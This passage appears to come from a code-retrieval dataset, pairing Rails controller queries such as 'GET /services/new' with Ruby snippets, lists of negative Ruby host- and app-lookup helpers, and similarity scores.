@hosts = Host.all :select => "id, name" , :conditions => { :tenant_id => current_user.tenant_id } if @type == "host"
@apps = App.all :select => "id, name" , :conditions => { :tenant_id => current_user.tenant_id } if @type == "app"
@sites = Site.all :select => "id, name" , :conditions => { :tenant_id => current_user.tenant_id } if @type == "site"
@devices = Device.all :select => "id, name" , :conditions => { :tenant_id => current_user.tenant_id } if @type == "device"
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def if_app(app, req)\n app == :dashboard ? (req + '.http.host ~ \"(dashboard|studio)\"') : nil\nend",
"def dev_host\n case Socket.gethostname\n when /romeo-foxtrot/i ; true\n else ; false\n end\nend",
"def app_host\n @data[\"app_host\"]\n end",
"def selected_host\n\t\tselhost = Target.find(:first, :conditions => [\"selected > 0\"] )\n\t\tif selhost\n\t\t\treturn selhost.host\n\t\telse\n\t\t\treturn\n\t\tend\t\n\tend",
"def default_host\n host_list.first\n end",
"def selected_host\n\t\tselhost = WmapTarget.find(:first, :conditions => [\"selected != 0\"] )\n\t\tif selhost\n\t\t\treturn selhost.host\n\t\telse\n\t\t\treturn\n\t\tend\n\tend",
"def get_host(host)\n\t\t\tif host == 'gateway'\n\t\t\t\tif @prod_env\n\t\t\t\t\t@gateway_prod\n\t\t\t\telse\n\t\t\t\t\t@gateway_dev\n\t\t\t\tend\n\t\t\telsif host == 'panel'\n\t\t\t\tif @prod_env\n\t\t\t\t\t@panel_prod\n\t\t\t\telse\n\t\t\t\t\t@panel_dev\n\t\t\t\tend\n\t\t\telsif host == 'minhaconta'\n\t\t\t\tif @prod_env\n\t\t\t\t\t@minhaconta_prod\n\t\t\t\telse\n\t\t\t\t\t@minhaconta_dev\n\t\t\t\tend\n\t\t\tend\n\t\tend",
"def host_is_app_host?(hostname)\n hostname == \"adapt.127.0.0.1.xip.io\"\n end",
"def default_host\n primary_host = hosts.primary.first\n primary_host.blank? ? \"#{subdomain}.adaptapp.com\" : primary_host.hostname\n end",
"def host\n @options[:host]\n end",
"def choseScheme()\n \tscheme = UI.select(\"Select scheme:\", [\"CIASMovie\", \"ZhongDuMovie\", \"BaoShan\", \"HuaChenMovie\", \"HengDian\"])\n\n\tENV[\"SCHEME\"] = scheme\n\tENV[\"APP_ID\"] = ENV[\"APP_ID_#{scheme}\"]\n\n end",
"def with_primary_app_server(&block)\n with_env('HOSTS',primary_app_server.to_s) { yield }\n end",
"def main_site_host\n case Rails.env\n when 'development'\n # '192.168.1.140' # to test in ie\n # 'ngoaidmap.dev'\n 'iom.dev'\n when 'test'\n 'example.com'\n when 'staging'\n Settings.main_site_host\n when 'production'\n Settings.main_site_host\n end\n end",
"def os\n @host\n end",
"def host\n @host || HOST_PRODUCTION\n end",
"def app(name=nil)\n if @app.nil? && name.nil? && Remotely.apps.size == 1\n name = Remotely.apps.first.first\n end\n\n (name and @app = name) or @app\n end",
"def concierge_host\n context[:host]\n end",
"def app?\n app_host = Radiant.config['app.host']\n match = unless app_host.blank?\n request.host == app_host\n else\n request.host =~ /^app\\./\n end\n !!match\n end",
"def primary_app_server\n @primary_app_server ||= find_servers(:roles => :app, :only => {:primary => true}).first || find_servers(:roles => :app).first\n end",
"def hostname\n @options[:host][:name] if @options[:host]\n end",
"def index\n cloud = shift_argument\n validate_arguments!\n\n if cloud\n action(\"Switching to #{cloud} cloud\") do\n heroku_host = case cloud\n when \"standard\" then \"heroku.com\"\n when \"shadow\" then \"heroku-shadow.com\"\n else \"#{cloud}.herokudev.com\"\n end\n Heroku::Auth.write_heroku_host heroku_host\n end\n else\n puts case Heroku::Auth.host\n when \"heroku.com\" then \"standard\"\n when \"heroku-shadow.com\" then \"shadow\"\n when /^(\\w+).herokudev.com/ then $1\n end\n end\n end",
"def default_app()\n @apps[0]\n end",
"def app\n @options[:app]\n end",
"def host; end",
"def host; end",
"def host; end",
"def host; end",
"def host; end",
"def host; end",
"def host; end",
"def host; end",
"def host; end",
"def select_app file_name \n\t\tftype = file_type( file_name ).downcase\n\t\t@app_map[ ftype ]\n\tend",
"def get_host\n roles(:web).server host\n end",
"def target_host\n\t\tif(self.respond_to?('rhost'))\n\t\t\treturn rhost()\n\t\tend\n\n\t\tif(self.datastore['RHOST'])\n\t\t\treturn self.datastore['RHOST']\n\t\tend\n\n\t\tnil\n\tend",
"def host_id; 'localhost' end",
"def host\n conf['dashboard']['host']\n end",
"def first_db_host\n @db_host ||= find_servers(:roles => :db).map(&:to_s).first\nend",
"def host\n @host = self.hostuser\n end",
"def choose_layout\n logger.info \"\\n HOST #{request.host}\\n\"\n if current_user.present?\n if current_user.role?(:admin)\n 'backend_admin'\n else\n 'backend'\n end\n else\n 'application'\n end\n end",
"def has_required_host?\n true\n end",
"def desired_hostname\n if path.start_with?('/foo/en')\n Rails.env.staging? ? 'foo-staging.infopark.com' : 'www.foo.com'\n else\n # Default hostname\n Rails.env.staging? ? 'website-staging.infopark.com' : 'www.website.com'\n end\n end",
"def host; config[:host]; end",
"def host=(_); end",
"def host\n active_backend.host\n end",
"def hostname\n Rails.env.development? ? 'http://localhost:3000' : 'http://coderalert.com'\n end",
"def host=(_arg0); end",
"def host=(_arg0); end",
"def default_server\n server?(:default)\n end",
"def host\n @host\n end",
"def select_app file_name\n ftype = file_type file_name\n @app_map[ftype]\n end",
"def host(value = nil)\n if value\n @host = value\n else\n @host ||= 'localhost'\n end\n end",
"def host\n @host ||= target.split(':',2).first\n end",
"def host\n \"#{request.env['rack.url_scheme']}://#{request.host}:#{request.port}\".sub(':80','')# rescue 'http://locahost:3000'\n end",
"def host\n @host\n end",
"def host\n @host\n end",
"def is?(match)\n match === RbConfig::CONFIG[\"host_os\"]\n end",
"def web_server\n if %{apache apache2}.include? node[:webapp][:web_server]\n \"apache2\"\n else\n \"nginx\"\n end\nend",
"def select_test_app\n # get environment\n env = $config['modules']['ui']['apps']['imedidata']['base_url']\n\n if env.include? \"sandbox\"\n test_app_sb.find('input').set(true)\n elsif env.include? \"validation\"\n test_app.find('input').set(true)\n end\n end",
"def hostname\n options[:hostname]\n end",
"def host\n @host || Sapience.config.host\n end",
"def host\n self.host\n end",
"def select_app file_name \n ftype = file_type( file_name ).downcase\n @app_map[ ftype ]\n end",
"def select_app file_name\n ftype = file_type( file_name ).downcase\n @app_map[ ftype ]\n end",
"def discover_current_site\n site_from_host\n end",
"def my_os\n if ENV['LAUNCHY_HOST_OS'] then\n Launchy.log \"#{self.name} : Using LAUNCHY_HOST_OS override of '#{ENV['LAUNCHY_HOST_OS']}'\"\n return ENV['LAUNCHY_HOST_OS']\n else\n ::Config::CONFIG['host_os']\n end\n end",
"def host?\n self.host\n end",
"def host\r\n return for_context(nil, false) { |c| c.host }\r\n end",
"def get_host\n @host\n end",
"def __default_network_host\n case version\n when /^0|^1/\n '0.0.0.0'\n when /^2/\n '_local_'\n when /^5|^6|^7/\n '_local_'\n else\n raise RuntimeError, \"Cannot determine default network host from version [#{version}]\"\n end\n end",
"def get_host(host_id = self.current_host_id)\n if host_id\n self.is_guest_of_what.find {|host| host.id == host_id}\n else\n self.is_guest_of_what.first\n end\n end",
"def current_host\n @current_host ||= \"#{request.protocol}#{request.host_with_port}\"\n end",
"def set_host(v)\n v = \"\" if v.nil? || v == \"localhost\"\n @host = v\n end",
"def host\n # find host in opts first\n host = options[:host] || @configuration['host']\n host = 'http://api.unipept.ugent.be' if host.nil? || host.empty?\n\n # add http:// if needed\n if host.start_with?('http://', 'https://')\n host\n else\n \"http://#{host}\"\n end\n end",
"def host(h = nil)\n if h\n @host = h\n else\n @host\n end\n end",
"def get_host(opts)\n if opts.kind_of? ::Mdm::Host\n return opts\n elsif opts.kind_of? String\n raise RuntimeError, \"This invocation of get_host is no longer supported: #{caller}\"\n else\n address = opts[:addr] || opts[:address] || opts[:host] || return\n return address if address.kind_of? ::Mdm::Host\n end\n ::ApplicationRecord.connection_pool.with_connection {\n wspace = Msf::Util::DBManager.process_opts_workspace(opts, framework)\n\n address = Msf::Util::Host.normalize_host(address)\n return wspace.hosts.find_by_address(address)\n }\n end",
"def host_os; end",
"def host_os; end",
"def site_from_host\n Site.find_for_host(request.host)\n end",
"def get_target(host)\n case host\n when 'server'\n node = $server\n when 'ceos-minion'\n node = $ceos_minion\n when 'ssh-minion'\n node = $ssh_minion\n when 'sle-minion'\n node = $minion\n when 'sle-client'\n node = $client\n when 'sle-migrated-minion'\n node = $client\n else\n raise 'Invalid target.'\n end\n node\nend",
"def get_target(host)\n case host\n when 'server'\n node = $server\n when 'ceos-minion'\n node = $ceos_minion\n when 'ssh-minion'\n node = $ssh_minion\n when 'sle-minion'\n node = $minion\n when 'sle-client'\n node = $client\n when 'sle-migrated-minion'\n node = $client\n else\n raise 'Invalid target.'\n end\n node\nend",
"def select(what, for_what=nil)\n for_what ? select_app(what[:app], for_what) : select_item(what)\n end",
"def set_device\n # if HTTP_USER_AGENT is blank/nil defaults to blank, i.e. desktop \n agent = request.env[\"HTTP_USER_AGENT\"].blank? ? \"\" : request.env[\"HTTP_USER_AGENT\"].downcase \n if agent =~ tablet_agents\n \"tablet\"\n elsif (agent =~ mobile_agents_one) || (agent[0..3] =~ mobile_agents_two)\n \"mobile\"\n else\n \"desktop\"\n end \n end",
"def db_host(app_id, database_id)\n all_addons = heroku_client.addon.list_by_app(app_id)\n database_json = all_addons.find do |addon|\n [addon['id'], addon['addon_service']['id']].include?(database_id)\n end\n return STARTER_HOST if database_json.nil?\n\n host_for(database_json)\n end",
"def needs_host_list?\n vima? || okeanos?\n end",
"def host\n ENV['CA_HOST'] || DEFAULT_HOST\n end",
"def select_a_server(name, url)\n # no url, no name, try to use current master\n if url.nil? && name.nil?\n if config.current_master\n return config.current_master\n else\n exit_with_error 'URL not specified and current master not selected'\n end\n end\n\n if name && url\n exact_match = config.find_server_by(url: url, name: name)\n return exact_match if exact_match # found an exact match, going to use that one.\n\n name_match = config.find_server(name)\n\n if name_match\n #found a server with the provided name, set the provided url to it and return\n name_match.url = url\n return name_match\n else\n # nothing found, create new.\n return Kontena::Cli::Config::Server.new(name: name, url: url)\n end\n elsif name\n # only --name provided, try to find a server with that name\n name_match = config.find_server(name)\n\n if name_match && name_match.url\n return name_match\n else\n exit_with_error \"Master #{name} was found from config, but it does not have an URL and no URL was provided on command line\"\n end\n elsif url\n # only url provided\n if url =~ /^https?:\\/\\//\n # url is actually an url\n url_match = config.find_server_by(url: url)\n if url_match\n return url_match\n else\n return Kontena::Cli::Config::Server.new(url: url, name: nil)\n end\n else\n name_match = config.find_server(url)\n if name_match\n unless name_match.url\n exit_with_error \"Master #{url} was found from config, but it does not have an URL and no URL was provided on command line\"\n end\n return name_match\n else\n exit_with_error \"Can't find a master with name #{name} from configuration\"\n end\n end\n end\n end",
"def current_application(request)\n app_selector.call(request, applications)\n end",
"def host_os\n name = `uname`.split(' ').first.downcase.to_sym\n case name\n when :linux\n :linux\n when :darwin\n :macosx\n else\n :unknown\n end\n end",
"def deduce_tenant_host\n if request.host.downcase.start_with?('www.')\n request.host[4..-1]\n else\n request.host\n end\n end",
"def host\n @host ||= Chimps.config[:catalog][:host]\n end",
"def on_db_host(host)\n\tend",
"def host\n Socket.gethostname\n end",
"def host\n Socket.gethostname\n end",
"def server_selector\n @server_selector ||= ServerSelector.get(read_preference || database.server_selector)\n end",
"def server_software\r\n(@env['SERVER_SOFTWARE'] && /^([a-zA-Z]+)/ =~ @env['SERVER_SOFTWARE']) ? $1.downcase : nil\r\nend",
"def host\n @host ||= Babushka::SystemProfile.for_host\n end",
"def pull_request_host\n\t\tpull_request_where == 'jackrabbit' ? ALF_CFG['host'] : ALF_CFG[\"cedar_host\"]\n\tend",
"def host_or_domain\n return @host_or_domain\n end",
"def get_os\n if RbConfig::CONFIG['host_os'] =~ /mswin|mingw|cygwin/\n return :Windows\n elsif RbConfig::CONFIG['host_os'] =~ /darwin/\n return :Mac\n elsif RbConfig::CONFIG['host_os'] =~ /linux/\n return :Linux\n elsif RbConfig::CONFIG['host_os'] =~ /bsd/\n return :BSD\n else\n return :unknown_os\n end\nend"
] |
[
"0.6547287",
"0.6383476",
"0.62955004",
"0.6291793",
"0.62753516",
"0.61840636",
"0.6124936",
"0.6103736",
"0.6068235",
"0.6048353",
"0.59888935",
"0.5938477",
"0.5929573",
"0.59189403",
"0.59010845",
"0.5884807",
"0.5877257",
"0.58755",
"0.58680695",
"0.5856544",
"0.58012766",
"0.57259595",
"0.57151127",
"0.5707881",
"0.5707881",
"0.5707881",
"0.5707881",
"0.5707881",
"0.5707881",
"0.5707881",
"0.5707881",
"0.5707881",
"0.5694412",
"0.5681001",
"0.56762993",
"0.56631225",
"0.56455326",
"0.56332016",
"0.56329775",
"0.563046",
"0.5624937",
"0.56246907",
"0.56220967",
"0.56062484",
"0.55974865",
"0.55863357",
"0.55779195",
"0.55779195",
"0.5566201",
"0.5565247",
"0.55643123",
"0.5561317",
"0.5560829",
"0.5555412",
"0.5553077",
"0.5553077",
"0.5548454",
"0.5539486",
"0.553576",
"0.5530247",
"0.55288005",
"0.5518386",
"0.55079824",
"0.5492042",
"0.549183",
"0.5482735",
"0.54763126",
"0.54709923",
"0.54621476",
"0.54613465",
"0.54553926",
"0.5448722",
"0.54271376",
"0.54140204",
"0.5395088",
"0.53945786",
"0.5393293",
"0.5393293",
"0.53912354",
"0.53909475",
"0.53909475",
"0.5383584",
"0.5379228",
"0.53767204",
"0.53753865",
"0.537511",
"0.5371236",
"0.53640205",
"0.53558904",
"0.53491086",
"0.5347576",
"0.53408575",
"0.5338028",
"0.53370243",
"0.53294665",
"0.5329006",
"0.53250504",
"0.5322142",
"0.53160566",
"0.53076065"
] |
0.54177153
|
73
|
GET /services/new GET /services/new.xml
|
def new
submenu_item 'services-new'
@service = Service.new(:type_id => params[:type_id], :check_interval => 300)
@service_type = @service.type
service_param
unless @service_type
if @app
redirect_to types_app_services_path(@app)
elsif @site
redirect_to types_site_services_path(@site)
elsif @host
redirect_to types_host_services_path(@host)
elsif @device
redirect_to types_device_services_path(@device)
else
redirect_to params.update(:action => "select")
end
return
end
dictionary
s = @serviceable
@service.agent_id = @host.agent_id if @host
@service.serviceable_id = s && s.id
@service.name = @service_type.default_name
@service.ctrl_state = @service_type.ctrl_state
@service.threshold_critical = @service_type.threshold_critical
@service.threshold_warning = @service_type.threshold_warning
@service.check_interval = @default_check_interval
respond_to do |format|
format.html
format.xml { render :xml => @service }
end
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def new\n @page_id = \"services\"\n @service = Service.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @service }\n end\n end",
"def new\n @service = Service.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml\n end\n end",
"def new\n @service = Service.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @service }\n end\n end",
"def new\n @service = Service.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @service }\n end\n end",
"def new\n @service_version = ServiceVersion.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @service_version }\n end\n end",
"def new\n @final_service = FinalService.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @final_service }\n end\n end",
"def new\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => new_vurl }\n end\n end",
"def new\n @service = Service.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @service }\n end\n end",
"def new\n @service = Service.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @service }\n end\n end",
"def new\n @service = Service.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @service }\n end\n end",
"def new\n @service = Service.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @service }\n end\n end",
"def new\n @nossos_servico = NossosServico.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @nossos_servico }\n end\n end",
"def new\n @service = Service.new\n\n respond_to do |format|\n format.html # new.html.erb\n end\n end",
"def new\n @complex_service = ComplexService.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @complex_service }\n end\n end",
"def create\n\n @service = Service.new(params[:service])\n respond_to do |format|\n if @service.save\n\n format.html { }\n format.xml { render :xml => @service }\n else\n format.html { render :action => \"new\" }\n format.xml { render :xml => @service }\n end\n end\n end",
"def new\n respond_to do |format|\n format.html { render_template } # new.html.erb\n format.xml { render xml: @vip_programmer_service }\n end\n end",
"def new\n @tservicio = Tservicio.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @tservicio }\n end\n end",
"def new\n @network = Network.new\n @service = Fileservice.new(@network)\n \n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @network }\n end\n end",
"def create\n\n respond_to do |format|\n if @service.save\n format.html { redirect_to(@service, :notice => t(\"screens.notice.successfully_created\")) }\n format.xml { render :xml => @service, :status => :created, :location => @service }\n else\n format.html { render :action => \"new\" }\n format.xml { render :xml => @service.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def new\n @service = Service.new\n @service.date = Time.now.strftime('%Y-%m-%d ')\n\n respond_to do |format|\n format.html # new.html.haml\n format.json { render json: @service }\n end\n end",
"def new\n @approximate_service = ApproximateService.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @approximate_service }\n end\n end",
"def create\n @service = Service.new(params[:service])\n\n respond_to do |format|\n if @service.save\n flash[:notice] = 'Service was successfully created.'\n format.html { redirect_to(@service) }\n format.xml { render :xml => @service, :status => :created, :location => @service }\n else\n format.html { render :action => \"new\" }\n format.xml { render :xml => @service.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def new\n @service_checker = ServiceChecker.new(:strict => \"0\", :checker_type => \"0\")\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @service_checker }\n end\n end",
"def new\n @services_charger = ServicesCharger.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @services_charger }\n end\n end",
"def new\n @service_style = ServiceStyle.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @service_style }\n end\n end",
"def create\n @service = Service.new(params[:service])\n \n respond_to do |format|\n if @service.save\n flash[:notice] = 'Service was successfully created.'\n format.html { redirect_to(@service) }\n format.xml { render :xml => @service, :status => :created, :location => @service }\n else\n format.html { render :action => \"new\" }\n format.xml { render :xml => @service.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def new\n @service.service_type = params[:service_type]\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @service }\n end\n end",
"def new\n @service_center = ServiceCenter.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @service_center }\n end\n end",
"def new_rest\n @instrument_version = InstrumentVersion.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @instrument_version }\n end\n end",
"def create\n @service = Service.new(params[:service])\n\n respond_to do |format|\n if @service.save\n format.html { redirect_to(admin_service_path(@service), :notice => 'Service was successfully created.') }\n format.xml { render :xml => @service, :status => :created, :location => @service }\n else\n format.html { render :action => \"new\" }\n format.xml { render :xml => @service.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def new\n @tso = Tso.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @tso }\n end\n end",
"def new\n respond_to do |format|\n format.html { render_template } # new.html.erb\n format.xml { render xml: @system }\n end\n end",
"def new\n @service = Service.new\n\n # If a valid type is received, apply to the host to create.\n check_priority_param\n @service.priority = @priority if(!@priority.blank?)\n\n # Add custom views paths\n prepend_view_path \"app/views/services\"\n prepend_view_path \"lib/probes/#{@service.probe}/views\"\n\n respond_to do |format|\n format.html\n end\n end",
"def new\n respond_to do |format|\n format.html { render_template } # new.html.erb\n format.xml { render xml: @software }\n end\n end",
"def new\n @service = Service.new\n @vendors = Vendor.all\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @service }\n end\n end",
"def new\n @rest_service = RestService.new\n params[:annotations] = { }\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @rest_service }\n end\n end",
"def new\n @nagios_service_escalation_template = NagiosServiceEscalationTemplate.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @nagios_service_escalation_template }\n end\n end",
"def new\n @query = Query.new\n @discActions = DiscoveryActions.new\n $DATA_SERVICES ||= @discActions.getDataServices\n @services = $DATA_SERVICES\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @query }\n end\n end",
"def new\n @online_service = OnlineService.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @online_service }\n end\n end",
"def new\n @service_length = ServiceLength.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @service_length }\n end\n end",
"def create\n # Creation of a Service resource is not allowed. Must be created as part of the creation of a specific service type resource.\n flash[:error] = 'Select the type of service you would like to submit first'\n respond_to do |format|\n format.html { redirect_to(new_service_url) }\n format.xml { render :xml => '', :status => 404 }\n end\n end",
"def newX\n @server = Server.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @server }\n end\n end",
"def new\n @service_plan = ServicePlan.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @service_plan }\n end\n end",
"def new\n @title = \"New Operations\"\n @operation = Operation.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @operation }\n end\n end",
"def new\n @project = Project.new\n @services = Service.find(:all)\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @project }\n end\n end",
"def new\n @webservicetolisten = Webservicetolisten.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @webservicetolisten }\n end\n end",
"def new\n @service_type = ServiceType.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @service_type }\n end\n end",
"def new\n @service_request = ServiceRequest.new\n\t@servicegrades = ServiceGrade.all\n\t@curr_menu = \"layouts/hostfamily_menu\"\n\t@curr_layout = \"layouts/user_layout\"\n\t\t\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @service_request }\n end\n end",
"def new\n @discovery = Discovery.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @discovery }\n end\n end",
"def new\n @node = Node.scopied.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @node }\n end\n end",
"def new_rest\n @item_usage = ItemUsage.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @item_usage }\n end\n end",
"def new\n respond_to do |format|\n format.html\n format.xml\n end\n end",
"def new\n respond_to do |format|\n format.html { render_template } # new.html.erb\n format.xml { render xml: @get_started_page }\n end\n end",
"def new\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @instituto }\n end\n end",
"def new\n respond_to do |format|\n format.html # new.html.erb\n format.xml \n end\n end",
"def new\n @servicetype = Servicetype.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @servicetype }\n end\n end",
"def new\n @serie = Serie.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @serie }\n end\n end",
"def new\n @servicetype = Servicetype.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render :json => @servicetype }\n end\n end",
"def new\n @client = Client.new\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @client }\n end\n\n end",
"def new\n @service_check_detail = ServiceCheckDetail.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @service_check_detail }\n end\n end",
"def new\n @client = Client.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @client }\n end\n end",
"def new\n @client = Client.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @client }\n end\n end",
"def new_rest\n @entry_item = EntryItem.new\n\n respond_to do |format|\n #format.html # new.html.erb\n format.xml { render :xml => @entry_item }\n end\n end",
"def new\n @client = Client.new\n respond_to do |format|\n format.html #new.html.erb\n format.xml { render :xml => @client }\n end\n end",
"def new\n @provider = Provider.new\n @provider.build_address\n @services = Service.all\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @provider }\n end\n end",
"def new\n @solicitud = Solicitud.new\n \n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @solicitud }\n end\n end",
"def new\n @bus_service = BusService.new\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @bus_service }\n end\n end",
"def new\n @people = People.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @people }\n end\n end",
"def new\n @todos = Todos.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @todos }\n end\n end",
"def new\n @st_pi = StPi.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @st_pi }\n end\n end",
"def new\n @procedure = Procedure.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @procedure }\n end\n end",
"def new\n @echo = Echo.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @echo }\n end\n end",
"def add_service(service={})\n request :post, '/services', service\n end",
"def new\n @additional_service = AdditionalService.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @additional_service }\n end\n end",
"def new_rest\n @entry_instrument = EntryInstrument.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @entry_instrument }\n end\n end",
"def new\n @novel = Novel.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @novel }\n end\n end",
"def new\n @estagio = Estagio.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @estagio }\n end\n end",
"def service(id)\n request :get, \"/services/#{id}\"\n end",
"def new\n @sti = Sti.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @sti }\n end\n end",
"def new\n respond_to do |format|\n format.html { render_template } # new.html.erb\n format.xml { render xml: @page }\n end\n end",
"def new\n @operation = Operation.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @operation }\n end\n end",
"def new\n @sprint = Sprint.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @sprint }\n end\n end",
"def new\n @sprint = Sprint.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @sprint }\n end\n end",
"def new\n @serviceorg = Serviceorg.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @serviceorg }\n end\n end",
"def new\n @recurso = Recurso.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @recurso }\n end\n end",
"def new\n @api = Api.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @api }\n end\n end",
"def new\n @service_record = ServiceRecord.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @service_record }\n end\n end",
"def new\n @namespace = Namespace.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @namespace }\n end\n end",
"def new\n\t\tPesqSecDep()\n\t\t@cliente = Cliente.new\n\t\trespond_to do |format|\n\t\t\tformat.html # new.html.erb\n\t\t\tformat.xml {render :xml => @cliente}\n\t\tend\n\tend",
"def new\n @status = Status.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @status }\n end\n end",
"def new\n @status = Status.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @status }\n end\n end",
"def new\n @status = Status.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @status }\n end\n end",
"def new\n @omatsuri = Omatsuri.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @omatsuri }\n end\n end",
"def new\n @cliente = Cliente.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @cliente }\n end\n end",
"def new\n @cliente = Cliente.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @cliente }\n end\n end",
"def new\n @value_added_service = ValueAddedService.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render json: @value_added_service }\n end\n end",
"def new\n @servicio = Servicio.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.json { render :json => @servicio }\n end\n end",
"def new\n @shelf = Shelf.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @shelf }\n end\n end",
"def new\n logger.debug 'new_some interesting information'\n @comdty = Comdty.new\n setvariables\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @comdty }\n end\n end",
"def new\n @route = Route.new\n\n respond_to do |format|\n format.html # new.html.erb\n format.xml { render :xml => @route }\n end\n end"
] |
[
"0.75526565",
"0.751664",
"0.74515957",
"0.74515957",
"0.7020331",
"0.6930191",
"0.672832",
"0.67085844",
"0.67085844",
"0.67085844",
"0.67085844",
"0.66661394",
"0.6652868",
"0.6649297",
"0.66376245",
"0.6555149",
"0.6471848",
"0.647095",
"0.6424378",
"0.6417366",
"0.6382543",
"0.6358173",
"0.6352584",
"0.6352069",
"0.6345033",
"0.63436645",
"0.6342431",
"0.6322157",
"0.63137484",
"0.6293398",
"0.6288208",
"0.6280398",
"0.62621313",
"0.62512535",
"0.62245035",
"0.62190604",
"0.62150633",
"0.6210623",
"0.61895365",
"0.6187218",
"0.61840034",
"0.61803544",
"0.61693513",
"0.6153133",
"0.6142242",
"0.61229",
"0.610741",
"0.61016667",
"0.60969263",
"0.60835785",
"0.60720307",
"0.6071866",
"0.60631937",
"0.60604477",
"0.6059892",
"0.60562515",
"0.60550755",
"0.605238",
"0.60510665",
"0.604776",
"0.604215",
"0.604215",
"0.60364836",
"0.6031131",
"0.60304064",
"0.60240835",
"0.60211354",
"0.60207707",
"0.60182154",
"0.6017251",
"0.5994964",
